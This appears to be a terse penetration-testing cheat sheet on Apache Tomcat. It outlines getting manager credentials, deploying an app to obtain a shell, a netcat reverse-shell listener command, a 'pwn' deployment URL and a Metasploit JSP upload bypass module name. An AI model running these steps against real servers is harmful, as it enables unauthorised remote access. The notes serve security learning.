Apache Tomcat
Last updated
Last updated
For /manager, we need credentials.
For automatic brute force
When we got the credentials for manager, we can get shell.
Browse -> Deploy
nc -nvlp 80
http://192.168.1.2:8080/pwn/
msf6 exploit(multi/http/tomcat_jsp_upload_bypass)